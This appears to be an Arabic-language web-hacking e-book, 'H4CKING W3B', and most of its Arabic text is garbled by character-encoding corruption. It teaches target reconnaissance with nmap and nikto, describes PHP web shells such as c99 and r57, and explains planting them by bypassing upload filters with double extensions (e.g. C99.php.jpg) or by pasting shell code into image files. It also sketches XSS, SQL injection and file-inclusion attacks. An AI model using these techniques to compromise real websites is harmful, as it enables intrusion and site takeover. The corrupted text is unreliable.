‫بسم اهلل الرمحن الرحيم‬

‫‪H‬‬ ‫‪4C‬‬ ‫‪KI‬‬ ‫‪NG W‬‬ ‫‪3B‬‬

‫ال إله إال اهلل حممد رسول اهلل‬

‫‪1431 \6 \9‬هـ‬
 ‫اٌٍالَ ػٍ‪١‬ىُ ‪ٚ‬نؼّح اهلل ‪ٚ‬تهواذح‬
‫اٌؽّك هلل نب اٌؼاٌّ‪ٚ ٓ١‬اٌظالج ‪ٚ‬اٌٍالَ ػٍ‪ ٝ‬أشهف األٔث‪١‬اء ‪ٚ‬اٌّهٌٍ‪ٓ١‬‬
‫ٔث‪ٕ١‬ا ِؽّك ‪ٚ‬ػٍ‪ ٝ‬آٌٗ ‪ٚ‬طؽثٗ ‪ٌٍ ِٓٚ‬ه ٌث‪ ٍٗ١‬إٌ‪ َٛ٠ ٝ‬اٌك‪.ٓ٠‬‬
‫اٌٍ‪ ُٙ‬الػٍُ ٌٕا إال تّا ػٍّرٕا أه أٔد ػالَ اٌغ‪ٛ١‬ب‬
‫ذؽ‪١‬ح ؿ‪١‬ثح ‪ٚ ,,,‬تؼك‬
‫فٍمك لّد تؼًّ اٌىراب ‪ٚ‬اٌؽّك هلل األِ‪ٛ‬ن ِ‪ٍ١‬هٖ ‪ٚ‬وً ٘ما تر‪ٛ‬ف‪١‬ك ِٓ اهلل‬
‫‪ٚ‬اٌؽّك هلل ػٍ‪ ٝ‬وً ش‪ٟ‬ء تكا‪٠‬راً أذّٕا ػكَ اٌرفكاَ أ‪ِ ٞ‬ؼٍ‪ِٛ‬ح ‪ٚ‬نقخ ف‪ٟ‬‬
‫٘ما اٌىراب ف‪ ٟ‬أل‪٠‬ح اٌٍٍّّ‪٘ ٓ١‬كف‪ ِٓ ٟ‬ػًّ ٘ما اٌىراب اٌفائكج ٌىً‬
‫أـ‪ٛ‬أ‪ ٟ‬اٌٍٍّّ‪٠ ٓ١‬رى‪٘ ْٛ‬ما اٌىراب ِٓ أنتغ فظ‪ٛ‬ي ‪ٚ‬وً فظً ‪٠‬فرٍف‬
‫ػٓ األـه ‪٠ٚ‬رّ‪١‬ى وً فظً ػٓ األـه تـهلٗ ‪ٚ‬أٌاٌ‪١‬ثٗ اٌفظً األ‪ٚ‬ي اٌؽ‪ً١‬‬
‫اٌٍّرفكِح ‪ِٚ‬ؼٍ‪ِٛ‬اخ ؼ‪ٛ‬ي و‪١‬ف‪١‬ح االـرهاق اٌفظً اٌصأ‪ ٟ‬أٌاٌ‪١‬ة اـرهاق‬
‫اٌّ‪ٛ‬الغ ‪ٚ‬و‪١‬ف‪١‬ح اٌؽظ‪ٛ‬ي ػٍ‪ ٝ‬شغهاخ اٌّ‪ٛ‬لغ اٌفظً اٌصاٌس أُ٘ األ‪ٚ‬اِه‬
‫اٌٍّرفكِح ف‪ ٟ‬اـرهاق اٌّ‪ٛ‬الغ ‪ٚ‬أُ٘ اٌرفاط‪ ً١‬ؼ‪ٛ‬ي ذفـ‪ ٟ‬اٌٍ‪١‬ف ِ‪ٛ‬ق‬
‫اٌفظً اٌهاتغ اٌٍ‪١‬ـهج ػٍ‪ ٝ‬اٌٍ‪١‬هفه ‪ٚ‬أُ٘ األق‪ٚ‬اخ اٌٍّرفكِح ‪ٚ‬اٌؽظ‪ٛ‬ي‬
‫ػٍ‪ ,root ٝ‬قػ‪ٔٛ‬ا ٔم‪ َٛ‬تع‪ٌٛ‬ح ػٓ اٌ‪ٙ‬ىه ‪ٚ‬ؿهق ‪ٚ‬أٌاٌ‪١‬ة اٌّفرهق ف‪ٟ‬‬
‫ػٍّ‪١‬ح اٌمهطٕح‪,‬التك ا‪ٚ‬الً اْ ذرؼٍُ أٌاٌ‪١‬ة اٌّفرهق ف‪ ٟ‬اـرهاق ٘كف‬
‫ِؼ‪ ٓ١‬ػٍ‪ٌ ٝ‬ث‪ ً١‬اٌّصاي أنقٔا اْ ٔفرهق ِ‪ٛ‬لغ ِؼ‪ ٓ١‬التك ِٓ ظّغ‬
‫ِؼٍ‪ِٛ‬اخ ا‪ٚ‬الً ػٓ اٌ‪ٙ‬كف ‪٠ٚ‬أذ‪ ٟ‬ق‪ٚ‬ن اٌّفرهق تعّغ اٌّؼٍ‪ِٛ‬اخ ػٓ‬
‫اٌ‪ٙ‬كف ِصً ‪ٚ‬ظ‪ٛ‬ق شغهج ف‪ ٟ‬اٌّ‪ٛ‬لغ ‪ِٚ‬ا إٌ‪ ٝ‬لاٌه شُ ‪٠‬م‪ َٛ‬تاٌ‪ٙ‬ع‪ َٛ‬ت‪ٙ‬مٖ‬
‫اٌّؼٍ‪ِٛ‬اخ ػٍ‪ ٝ‬اٌّ‪ٛ‬لغ ‪٘ٚ‬ىما ‪ٚ‬اذّٕا ٌىُ اٌّرؼح ‪ٚ‬اٌفائـكج‬
‫حمتويات الكتاب‬
‫اٌفظً األ‪ٚ‬ي‬
‫خّع اٌّعٍ‪ِٛ‬اث‬
‫اٌظ‪١‬زفز ‪server‬‬
‫أٔ‪ٛ‬اع اٌظ‪١‬زفزاث ‪types server‬‬
‫اٌشً ‪shell‬‬
‫شزذ شً ‪r57.php‬‬
‫ِزاوش اٌخسّ‪Upload ً١‬‬
‫اٌخسا‪trickery ً٠‬‬
‫اٌخسا‪trickery2 ً٠‬‬
‫اٌظىزبج ‪script‬‬
‫اٌثغـزة ‪Vulnerabilities‬‬
‫ٌغاث اٌبزِدت‬
‫األخطاء اٌبزِد‪١‬ت‬
 ‫‪ :.‬جّع اٌّعٍ‪ِٛ‬اث ‪.:‬‬
‫تكا‪٠‬راً ذ‪ٛ‬ظك ِ‪ٛ‬الغ ذم‪ َٛ‬تؼهع اٌّؼٍ‪ِٛ‬اخ ػٓ اٌ‪ٙ‬كف‬
‫ِصً إ‪ ً١ّ٠‬طاؼة اٌّ‪ٛ‬لغ ‪ٛٔٚ‬ع اٌٍّمُ ‪ٚ‬إٌظاَ اٌٍّرفكَ‬

‫‪http://www.netcraft.net/‬‬

‫‪http://www.whois.com/‬‬

‫ؿ‪١‬ة ا‪ٔ ْ٢‬م‪ َٛ‬تـه‪٠‬مح أـه‪ ٜ‬تعّغ اٌّؼٍ‪ِٛ‬اخ ػثه أقاج ‪Nmap‬‬
‫‪ٚ‬ظ‪١‬ف ٘مٖ األقاج ذم‪ َٛ‬تٍّػ اٌّ‪ٛ‬لغ ‪ ٚ‬اٌرفهاض إٌّافم‬
‫ج‬
‫اٌّفر‪ٛ‬غج ‪ٚ‬ظّ‪١‬غ اٌّؼٍ‪ِٛ‬اخ اٌر‪ ٟ‬لوهٔا ٌاتمًا ِصً ٔ‪ٛ‬ع اٌٍّمُ‬
‫أ‪ ً١ّ٠‬طاؼة اٌّ‪ٛ‬لغ إٌّافم اٌّفر‪ٛ‬ؼح ‪ٛٔٚ‬ع إٌظاَ ظّ‪١‬ؼ‪ٙ‬ا ِ‪ُٙ‬‬
‫ظكاً ف‪ ٟ‬ػٍّ‪١‬ح االـرهاق إْ شاءاهلل‬
‫ؿه‪٠‬مح أ‪٠‬ؼًا أـه‪ ٜ‬تعّغ اٌّؼٍ‪ِٛ‬اخ ػثه أقاج ‪nikto‬‬
‫‪ٚ‬ظ‪١‬فح ٘مٖ االقاج ذم‪ َٛ‬تٕفً أقاج ‪ nmap‬الوٓ ذفرٍف ف‪ٟ‬‬
‫اٌرفكاِ‪ٙ‬ا أ‪ ٞ‬أ‪ٙ‬ا ذؽراض ٌٍّرهظُ ٌغح ‪ perl‬اٌث‪١‬هي ‪ٚ‬ذٕظ‪١‬ثٗ‬
‫ػٍ‪ ٝ‬ظ‪ٙ‬اون ‪ٚ‬الذم‪ َٛ‬تٍّػ اٌث‪ٛ‬نذاخ ف‪ ٟ‬اٌّ‪ٛ‬لغ اٌّؼ‪ٓ١‬‬
‫‪ٌٛٚ‬ف أل‪ َٛ‬تشهغ ٘مٖ األق‪ٚ‬اخ ف‪ ٟ‬اٌفظً اٌصأ‪ ٟ‬طثهًا ظّ‪ً١‬‬
‫‪ٚ‬اهلل ‪ ٌٟٚ‬اٌر‪ٛ‬ف‪١‬ك‬
 ‫‪ :.‬اٌغ‪١‬شفش ‪.:‬‬
‫٘‪ ٛ‬ظ‪ٙ‬او اٌٍّرؼ‪١‬ف ٌٍّ‪ٛ‬لغ ‪ٚ‬ذى‪ٍِ ْٛ‬فاخ اٌّ‪ٛ‬لغ ذ‪ٛ‬ظك ف‪ ٛ٘ٚ ٗ١‬ظ‪ٙ‬او‬
‫وّث‪ٛ١‬ذه ػاق‪ ٞ‬الوٓ تّ‪ٛ‬اطفاخ غ‪١‬ه اٌع‪ٙ‬او اٌؼاق‪ ٞ‬وّصً اٌم‪ ٞ‬ذٍرفكِٗ‬
‫‪ِٛٚ‬اطفاذٗ وىثه ؼعُ اٌمهص ف‪ٌٚ ٗ١‬هػرٗ ٘ائٍٗ‬

‫ا‪٠‬ؼاً ِرظً تاإلٔرهٔد ‪ٌ 24‬اػٗ ‪٘ٚ‬ما ٌثة و‪ ْٛ‬اٌّ‪ٛ‬الغ شغـاٌٗ ‪24‬‬

‫ٌـاػٗ ‪ٍ٠ٚ‬رؼ‪١‬ف ‪( server‬اٌٍ‪١‬هفه) اوصه ِٓ ِ‪ٛ‬لغ ‪ٚ‬اؼك ‪٘ٚ ,‬ما‬
‫‪٠‬ؼرّك ِٓ ‪٢ server‬ـه‪ ِٓٚ ٜ‬شهوح ‪٢‬ـه‪ٜ‬‬

‫‪ٚ‬ػهفٕا ِالا ‪٠‬مظك تـ ‪ٚٚ server‬ظ‪١‬فرٗ‬

 ‫‪ :.‬أٔ‪ٛ‬اع اٌغ‪١‬شفشاث ‪.:‬‬
‫‪( ٚ‬اٌٍ‪١‬هفهاخ) ذفرٍف ِٓ ٌ‪١‬هفه إٌ‪ ٝ‬أـه‬

‫األـرالف ‪٠‬ى‪ ْٛ‬تإٌظاَ إِا اْ ‪٠‬ى‪ xp or linunx ْٛ‬ا‪ ٚ‬غ‪١‬ه٘ا ِٓ‬

‫األٔظّح ‪ٚ‬الوٓ ِا‪ّٕٙ٠‬ا ٕ٘ا‬
‫اوً ت‪ ٚ ٟ‬اٌٍ‪ٕ١‬ىً ‪ٚ‬اٌٍ‪١‬هفهاخ اٌر‪ ٟ‬ذهوة إٌظاَ ٘مٖ شائؼٗ‬
‫‪ٚ‬ذفرٍف أ‪ٚ‬اِه وً ِٓ اٌٍ‪ٕ١‬ىً ‪ٚ‬األوً ت‪ ٟ‬ف‪ ٟ‬اٌشً ‪ٌٛٚ‬ف ٔرـهق تئلْ‬
‫اهلل أ‪ٚ‬اِه وً ِٓ اٌٍ‪ٕ١‬ىً ‪ ٚ‬االوً ت‪ٚ ٟ‬اٌشـً‬
‫‪ٚ‬الوٓ غاٌثاً ِا‪٠‬ى‪ ْٛ‬اٌٍ‪١‬هفه ٌ‪١ٕ١‬ىً ‪ٚ‬اٌٍثة ف‪ ٟ‬لاٌه‬
‫‪٠‬ى‪ ْٛ‬ؼّا‪٠‬ح ٌٍٍ‪١‬هفه ‪ ٚ‬طؼ‪ٛ‬تح إـرهالٗ وّا ‪٠‬ىػّ‪ٚ ْٛ‬الوٓ تئلْ اهلل ٌٓ‬
‫ذى‪ٕ٘ ْٛ‬ان ػ‪ٛ‬ائك ِٓ ٔاؼ‪١‬ح أـرهاق اٌٍ‪١‬هفه‬
‫‪٘ٚ‬ذا اٌدذ‪ٚ‬ي ‪ٚ‬أ‪ٚ‬اِز وً ِٓ (اٌٍ‪ٕ١‬ىض) ‪( ٚ‬األوض ب‪)ٟ‬‬
 ‫‪ :.‬اٌشـً ‪.: shell‬‬
‫تّظـٍػ اٌ‪ٙ‬ىه ‪ ٛ٘ /‬و‪ٛ‬ق ـث‪١‬س ا‪ٍِ ٚ‬ف ذعًٍ ِثهِط تـه‪٠‬مح ذٍّػ‬
‫ٌـه تاٌرظهف تاٌّ‪ٛ‬لغ ‪ٚ‬الوٓ ؼٍة طالؼ‪١‬ره‬
‫‪ِ ٛ٘ٚ‬ثهِط تٍغح ‪٠ٚ php‬ؼرثه ٘ما اٌٍّف ا‪ ٚ‬اٌى‪ٛ‬ق فا‪٠‬ه‪ٚ‬ي تإٌٍثٗ‬
‫ٌٍؽّا‪٠‬اخ‬

‫‪ٚ‬اٌشً ‪٠‬فرٍف ِٓ شً إٌ‪ ٝ‬أـه ‪ٌٚ‬ألوه تؼؼاً ِٕ‪ٙ‬ا اٌّؼه‪ٚ‬فٗ ‪ٚ‬اٌّش‪ٛٙ‬نٖ‬

‫ا‪٠‬ؼاً وص‪١‬هج األٌرفكاَ الوٓ ذموه اٌ‪ٙ‬كف ‪ٚ‬اؼك ذٕف‪١‬م ا‪ٚ‬اِه اٌّفرهق‬

‫‪c99.php‬‬
‫‪r57.php‬‬
‫‪phpshell.php‬‬
‫‪sniper-sa.php‬‬
‫‪perl‬‬
‫وّا لوهٔا ٌاتماً أّ٘‪١‬ح اٌشً ‪ٚٚ‬ظ‪١‬فرٗ ‪ٚ‬لٍٕا ذفرٍف أٔ‪ٛ‬اػ‪ٙ‬ا الوٓ اٌ‪ٙ‬كف‬
‫‪ٚ‬اؼك ‪ٛ٘ٚ‬ا ذـث‪١‬ك أ‪ٚ‬اِه اٌّفرهق ٌ‪ٛ‬ف ٔم‪ َٛ‬ترفظ‪ ً١‬اٌشً ٔ‪ٛ‬ع‬
‫‪r57.php‬‬
.: r57.php ً‫ شهغ ش‬:.

safe_mode: ON
safe_mode: OFF
OFF ٚ‫ أ‬ON ْٛ‫ى‬٠ ْ‫ق اِا ا‬ِٛ ‫ٕ٘ا اٌٍف‬

ً‫ٕى‬١ٌٍ‫اِه ا‬ٚ‫ك أ‬١‫ّىٓ ذـث‬٠‫ ال‬on ‫ق‬ِٛ ‫ف‬١ٌٍ‫ ؼاٌح اْ ا‬ٟ‫ف‬

PHP version: 4.4.9

ٟ‫اطكان االتاذش‬

HDD Free : 361.63 MB HDD Total : 11.45 GB

‫هفه‬١ٌٍ‫ ا‬ٍٝ‫ ػ‬ٌٍّٝ‫ا‬ٚ ‫ح اٌّىاْ اٌفانؽ‬١ّ‫و‬

/home/fawazhack/public_html
‫هف‬١ٌٍ‫ا‬
‫ن‬ ٍٝ‫ِىأه ػ‬

Linux 2.4.20-42.9.legacy
َ‫ع إٌظا‬ٛٔ

uid=512(user) gid=512(user) groups=512(user)

‫هفه‬١ٌٍ‫ ا‬ٍٝ‫ره ػ‬١‫طالؼ‬
 ‫‪Upload files on server‬‬
‫ٌٍهفغ اٌٍّفاخ إٌ‪ ٝ‬اٌّ‪ٛ‬لغ‬

‫‪back-connect‬‬
‫الذظاي ػىٍ‪ ٟ‬تٍ‪١‬هفه ِصً إٌد واخ‬

‫تؼك اْ لّٕا ترفظ‪ (ً١‬اٌشً ِٓ ٔ‪ٛ‬ع ‪( r57.php‬‬

‫ػٕكِا ٔه‪٠‬ك أـرهاق اٌّ‪ٛ‬لغ التك ِٓ ‪ٚ‬ظ‪ٛ‬ق ؿه‪٠‬مح ذّىٕٕا ت‪ٛ‬ػغ أ‪ ٚ‬نفغ‬
‫اٌشً ف‪ ٟ‬اٌّ‪ٛ‬لغ ‪ٚ‬اٌٍ‪١‬هفه‬
‫‪ِٕٙٚ‬ا ِا‪ٍٟ٠‬‬
‫أِا اْ ذى‪ ْٛ‬ػثه شغهج ‪٠ٚ‬رُ أٌرغالٌ‪ٙ‬ا ‪ٔٚ‬ف‪ ِٓ ُٙ‬وٍّح اٌرغالي اْ ٔم‪َٛ‬‬
‫تهفغ اٌشً ‪ shell‬إٌ‪ ٝ‬اٌّ‪ٛ‬لغ اٌٍّر‪ٙ‬كف‬
‫أ‪ِ ٚ‬هوى ذؽّ‪ٔ ً١‬م‪ َٛ‬تاٌرؽا‪ ً٠‬ػٍ‪ٚ ٗ١‬نفغ ٍِف اٌشً تـهق ِفرٍفح‬
‫‪ٌٚ‬ألوه تؼغ ِٕ‪ٙ‬ا تؼك لٍ‪ً١‬‬

‫ِارا ‪٠‬مصذ بّشوض ححّ‪ً١‬‬

 ‫‪ِ :.‬هاوى اٌرؽّ‪.: ً١‬‬
‫تكا‪٠‬راً ‪٠‬ى‪ ْٛ‬اِركاق اٌّ‪ٛ‬لغ ٌ‪١‬ى‪ِ ْٛ‬هوى اٌرؽّ‪ ً١‬ف‪٘ ٗ١‬ىما‬
‫‪www. fawazhack .com/up‬‬
‫‪or‬‬
‫‪www.fawazhack.com/upload‬‬
‫‪ ً١ٌٚ‬تاٌؼه‪ٚ‬نج ٌ‪١‬ى‪ ْٛ‬اٌهاتؾ ٌّهوى اٌرؽّ‪ ً١‬واٌه‪ٚ‬اتؾ اٌٍاتمٗ اِا‬
‫ِهوى اٌرؽّ‪ً١‬‬
‫‪ٌ ٛ٘ٚ‬ىهتد ِثهِط تٍغح ‪ِ php‬فظض ٌٍهفغ ف‪ِ ٗ١‬صً اٌظ‪ٛ‬ن‬
‫‪ٚ‬ا‪٢‬ط‪ٛ‬اخ إٌ‪ ٝ‬أؾ‪..‬‬
‫‪ٚ‬ػٕك اٌكـ‪ٛ‬ي ػٍ‪ِ ٝ‬هوى نفغ ِؼ‪ٓ١‬‬
‫ٌ‪ٛ‬ف ذالؼظ ‪ٚ‬ظ‪ٛ‬ق اٌراٌ‪ٟ‬‬

‫االِركاقاخ اٌٍّّ‪ٛ‬ؼٗ‬

‫‪gif, jpg, png, bmp, psd, zip, rar‬‬

‫تؼك اْ ػهفٕا ِالا ‪٠‬مظك تّهوى اٌرؽّ‪ٚ ً١‬لٍٕا أٗ ٌىهتد ػٍ‪ٝ‬‬
‫اٌّ‪ٛ‬لغ ‪٠ٚ‬ف‪١‬ك ف‪ ٟ‬نفغ اٌٍّفاخ ‪ٚ‬وما‬
 ‫‪.: trickery‬‬ ‫‪ :.‬اٌرؽـا‪ً٠‬‬
‫اِا اٌرؽا‪ ً٠‬ف‪ ٛٙ‬اْ ٔم‪ َٛ‬تٍرغفاي ِهوى اٌرؽّ‪ ً١‬فّصالً ٌك‪ٕ٠‬ا شً‬
‫‪ٔٚ‬ه‪٠‬ك اْ ٔم‪ َٛ‬تهفؼٗ ‪ٚ‬الوٓ ال‪ّ٠‬ىٓ نفؼٗ تاٌشىً اٌظا٘ه أِاِىُ‬
‫‪c99.php‬‬
‫ٔم‪ َٛ‬تإٌظه إٌ‪ ٝ‬االِركاقاخ اٌٍّّ‪ٛ‬ؼٗ ٌٍّهوى اٌرؽّ‪ً١‬‬
‫‪zip,rar ,gif, jpg‬‬
‫األْ ٔم‪ َٛ‬تئػافح ألِركاق اٌشً ‪ php ٛ٘ٚ‬تى‪٠‬اقج اِركاق ٍِّ‪ٛ‬غ تٗ‬
‫تّهوى اٌرؽّ‪ً١‬‬

‫ٌ‪١‬ى‪٘ ْٛ‬ىما‬
‫‪C99.php.zip‬‬

‫‪C99.php.rar‬‬

‫‪C99.php.jpg‬‬

‫‪C99.php.gif‬‬

‫اِا اْ ‪٠‬م‪ َٛ‬تهفؼ‪ٙ‬ا ا‪ ٚ‬ال‪ٍ٠‬رع‪١‬ة ٌـٍة اٌهفغ‬

‫‪ٚ‬ػٕك ػكَ نفغ اٌٍّف ٔم‪ َٛ‬تاٌثؽس ف‪ٔ ٟ‬فً اٌٍ‪١‬هفه ػٍ‪ِ ٝ‬هوى ذؽّ‪ً١‬‬
‫أـه ‪ٔٚ‬م‪ َٛ‬ترـث‪١‬ك اٌفـ‪ٛ‬اخ اٌٍاتمٗ‬

‫‪٘ٚ‬مٖ اٌـه‪٠‬مٗ األ‪ٌٍ ٌٝٚ‬راؼ‪ ً١‬ػٍ‪ِ ٝ‬هاوى اٌرؽّ‪ً١‬‬

 ‫‪ :.‬اٌرؽـا‪.: trickery ً٠‬‬
‫‪ :.‬اٌطش‪٠‬مت اٌثأ‪ٌٍ ٗ١‬خحا‪.: ً٠‬‬
‫ف‪ ٟ‬اٌـه‪٠‬مٗ األ‪ ٌٝٚ‬لّٕا تٍرغفاي ِهوى اٌرؽّ‪ٚ ً١‬إٌر‪١‬عٗ اِا اْ ‪٠‬م‪َٛ‬‬
‫تهفؼ‪ٙ‬ا أ‪ ٚ‬ال‬
‫‪ٚ‬اٌـه‪٠‬مٗ اٌصأ‪ ٗ١‬ذؼرّك ػٍ‪ٚ ٝ‬ظ‪ٛ‬ق ِٓ األِركاقاخ اٌٍّّ‪ٛ‬ؼح اِركاق‬
‫اٌظ‪ٛ‬ن ِٕ‪ٙ‬ا ‪jpg and gif‬‬
‫ا‪٠‬ؼاً ذؼرّك ػٍ‪ِ ٝ‬هوى اٌرؽّ‪ ٛ٘ ً١‬اْ ‪٠‬م‪ َٛ‬ترؽٍ‪ ً١‬األو‪ٛ‬اق اٌفاطٗ‬
‫تاٌظ‪ٛ‬ن ا‪ٚ‬الً ٔم‪ َٛ‬تفرػ ط‪ٛ‬نج تئٌرفكاَ ‪ٔ notepad‬م‪ َٛ‬تٍٕؿ اٌى‪ٛ‬ق‬
‫اٌظا٘ه ٌٍظ‪ٛ‬نج ف‪ ٟ‬اٌّفىهج شُ اٌم٘اب إٌ‪ ٝ‬اٌشً ‪ٔٚ‬م‪ َٛ‬أ‪٠‬ؼاً تفرػ اٌشً‬
‫تـ ‪ notepad‬شُ ٔم‪ َٛ‬تٍظك اٌى‪ٛ‬ق اٌفاص تاٌشً إٌ‪ ٝ‬اٌظ‪ٛ‬نج الوٓ‬
‫ذّ‪ ًٙ‬لٍ‪ً١‬‬
‫ػٕك ٌظك اٌى‪ٛ‬ق إٌ‪ ٝ‬اٌشً التك اْ ذم‪ َٛ‬تؼًّ ٍِافٗ ت‪ ٓ١‬و‪ٛ‬ق اٌظ‪ٛ‬نٖ‬
‫‪ٚ‬اٌشً تؽ‪١‬س ال‪٠‬ثم‪ٍِ ٝ‬افح ت‪ ٓ١‬و‪ٛ‬ق اٌشً ‪ٚ‬و‪ٛ‬ق اٌظ‪ٛ‬نج‬
 ‫‪ :.‬اٌٍىهتد ‪.: script‬‬
‫تهٔاِط تٍ‪١‬ؾ ‪٠‬ؽر‪ ٞٛ‬ػٍ‪ ٝ‬ذؼٍ‪ّ١‬اخ ‪ٚ‬أ‪ٚ‬اِه ِؽك‪ٚ‬قٖ ذؤق‪ٚ ٞ‬ظائف ِؼ‪ٕٗ١‬‬
‫‪ٚ‬ذفرٍف اٌٍىهتراخ تىراتر‪ٙ‬ا إٌ‪ٌ ٝ‬غاخ ػكٖ ِصً‬
‫‪ Bash or asp or php‬إٌ‪ ٝ‬أـه‪ ِٓ ٜ‬اٌٍغاخ‬
.: ‫ اٌصغـهج‬:.
Vulnerabilities
‫لغ‬ٌّٛ‫ ا‬ٟ‫مغ ف‬٠ ٛ٘ٚ ٟ‫ــاء تهِع‬
‫ا اٌّفرهق‬ٍٙ‫ٍرغ‬٠ٚ ‫اٌٍىهتراخ‬ٚ ‫ اٌثهاِط‬ٟ‫ ٘ما اٌفـاء ِٓ ِثهِع‬ٟ‫أذ‬٠ٚ
‫لغ‬ٌٍّٛ ‫ي‬ٛ‫ط‬ٌٛ‫ ا‬ٟ‫ف‬

‫ ِعاي االــاء‬ٛ٘ٚ ‫ ٘ما اٌّعاي‬ٟ‫رُ ف‬ٙ‫ ذ‬ٟ‫الغ اٌر‬ٌّٛ‫ن ا‬ٚ‫ ق‬ٟ‫أذ‬٠ٚ

Vulnerabilities ‫ اٌصغهاخ‬ٚ‫ٗ ا‬١‫اٌثهِع‬
‫ اٌصغهاخ‬ٟ‫ر‬٠‫ن‬ٛ‫ى‬١ٌٍ‫ا‬ٚ ‫رُ تاٌصغهاخ‬ٙ‫الغ ذ‬ٌّٛ‫ِٓ ٘مٖ ا‬ٚ
/http://www.exploit-db.com
http://www.securityfocus.com/archive/1
http://www.jaascois.com
http://www.securiteam.com
http://securityreason.com
http://www.milw0rm.com
http://www.kernel.org
 http://www.ukrt.f2s.com
http://www.ussrback.com
http://www.packetstorm.securify.com
http://www.secureroot.com
http://www.rootshell.com
http://www.ussrback.com
http://www.securitydot.net
http://www.packetstormsecurity.org

ٟ‫اٌٍّرعكاخ ف‬ٚ ‫ػغ أـه اٌصغهاخ‬ٛ‫اً ذ‬١‫ػ‬ٛ‫ اٌث‬ٚ‫َ ا‬ٛ٠ ً‫الغ و‬ٌّٛ‫٘مٖ ا‬ٚ
‫ لاٌه‬ٌٝ‫ِا إ‬ٚ ‫اخ اٌّظاتٗ تفـاء‬١‫اٌثهِع‬
 ‫‪ :.‬أ‪ٛ‬اع اٌصغهاخ ‪.:‬‬
‫عأروش بعط ‪ ٚ‬أش‪ٙ‬ش اٌثغشاث اٌّ‪ٛ‬ج‪ٛ‬دة حاٌ‪١‬اً‬
‫‪‬‬ ‫‪Jommla‬‬
‫‪‬‬ ‫‪File Include‬‬
‫‪‬‬ ‫‪XSS‬‬
‫‪‬‬ ‫‪Sql Injection‬‬
‫‪‬‬ ‫‪Buffer over flow‬‬

‫‪Joomla‬‬
‫ظ‪ِٛ‬ال ‪ٛ٘ٚ‬ا ٌىهتد ‪ٚ‬الوٓ ٔظهاً ٌ‪ٛ‬ظ‪ٛ‬ق شغهاخ وص‪١‬هٖ ف‪٘ ٟ‬ما اٌٍىهتد‬
‫اقنظٕاٖ ػّٓ اٌصغهاخ ‪٠ٚ‬ر‪ٛ‬اظك ٘ما اٌٍىهتد تشىً وث‪١‬ه ف‪ ٟ‬اٌّ‪ٛ‬الغ‬
‫االظٕث‪ٚ ٗ١‬ػٕك اٌكـ‪ٛ‬ي ٌٍّ‪ٛ‬لغ ‪٠‬ؽًّ اٌٍىهتد اٌراٌ‪ٌٛ ٟ‬ف ذم‪ َٛ‬تئـرهالٗ‬
‫تئلْ اهلل وّا لٍٕا أٗ ‪ٛ٠‬ظك شغهاج ت‪ٙ‬ما اٌٍىهتد‬
‫‪File Include‬‬
‫‪٘ٚ‬ما إٌ‪ٛ‬ع ِٓ اٌصغهاخ ‪٠‬م‪ َٛ‬تهفغ ا‪ ٚ‬إقناض ِعٍك ِٓ ـانض اٌّ‪ٛ‬لغ ػثه‬
‫اٌهتؾ تّعٍك ـانظ‪ٕ٘ٚ ٟ‬ا ‪٠‬أذ‪ ٟ‬ق‪ٚ‬ن اٌّفرهق تهتؾ ٍِف اٌرعًٍ ‪shell‬‬
‫‪xss‬‬
‫أِا ٘ما إٌ‪ٛ‬ع ِٓ اٌصغهاخ ِٓ ـالٌ‪ٙ‬ا ٔمكن ٍٔؽة و‪٠ٛ‬ىى ِصً األقِ‪ ٓ١‬أ‪ٚ‬‬
‫ػؼ‪ِ ٛ‬ؼ‪ ٓ١‬تاٌّ‪ٛ‬لغ‬
‫‪Sql Injection‬‬
‫٘ما إٌ‪ٛ‬ع ِٓ اٌصغهاخ ‪٠‬م‪ َٛ‬ػثه أــاء تهِع‪١‬ح تئنٌاي أ‪ٚ‬اِه إٌ‪ ٝ‬لاػكج‬
‫اٌث‪١‬أاخ ِصً أِه ٌمهاءج ِؼٍ‪ِٛ‬اخ ػؼ‪٠ٛ‬ح األقِٓ نلُ ‪ٚ‬اؼك أ‪ ٚ‬أِه ٌرغ‪١١‬ه‬
‫وٍّح اٌّه‪ٚ‬ن ‪ّ٠ٚ‬ىٓ ت‪ٙ‬مٖ اٌصغهج ؼمٓ اٌّ‪ٛ‬لغ تاٌشً‬
 ‫‪Buffer over Flow‬‬
‫٘ما إٌ‪ٛ‬ع ِٓ اٌصغهاخ ذم‪ َٛ‬ت‪ٙ‬ع‪ َٛ‬ػٍ‪ ٝ‬اٌٍ‪١‬هفه ‪٘ ٍّٝ٠ٚ‬ع‪" َٛ‬اٌـفػ"‬
‫‪٠‬م‪ َٛ‬اٌّفرهق تاٌ‪ٙ‬ع‪ َٛ‬ػٍ‪ٔ ٝ‬مـٗ ِؼ‪ ٕٗ١‬ف‪ ٟ‬اٌٍ‪١‬هفه ِصً اٌ‪ٙ‬ع‪ َٛ‬ػٍ‪ٝ‬‬
‫ت‪ٛ‬نخ االف ذ‪ ٟ‬ت‪ٚ ftp ٟ‬اٌ‪ٙ‬كف ِٓ لاٌه إػؼاف اذظاي اٌٍ‪١‬هفه ‪ٚ‬فظً‬
‫اذظاٌٗ ت‪ٙ‬ما اٌث‪ٛ‬نخ أ‪ ٚ‬أ‪ ٞ‬ت‪ٛ‬نخ ‪٠‬م‪ َٛ‬تئٌرغالٌٗ اٌّفرهق ِٓ اٌث‪ٛ‬نذاخ‬
‫اٌّفر‪ٛ‬ؼح‪.‬‬
‫ٔىخف‪ ٟ‬ب‪ٙ‬زا اٌمذس ِٓ اٌثغشاث ‪٘ٚ‬زا إٌ‪ٛ‬ع ِٓ اٌثغشاث اٌّش‪ٛٙ‬سة‬
‫‪ٚ‬اٌّخ‪ٛ‬اجذة حاٌ‪١‬اً بىثشة ‪ٚ‬ال ٕٔغ‪ ٝ‬أْ اٌثغشاث وث‪١‬شة جذاً‬
 ‫‪ٌ :.‬غاخ اٌثهِعح ‪.:‬‬
‫‪ٌٚ‬ألوه اُ٘ ‪ٚ‬اش‪ٙ‬ه ٘مٖ اٌٍغاخ تهِعٗ ‪٠‬ظكن ِٓ ِثهِط ٘مٖ اٌٍغٗ ــاء فاقغ ‪ٕ٠ٚ‬رط شغهج‬
‫‪٠‬رُ اٌرغالٌ‪ٙ‬ا ػٓ ؿه‪٠‬ك اٌّفرـهق‬

‫ومن هذه اللغات ماييل‬

‫ٌغت ‪php‬‬

‫ٌغت ‪c‬‬

‫ٌغت ‪perl‬‬
 ‫ٌغت ‪html‬‬

‫ٌغت ‪python‬‬

‫ٌغت ‪Ruby‬‬

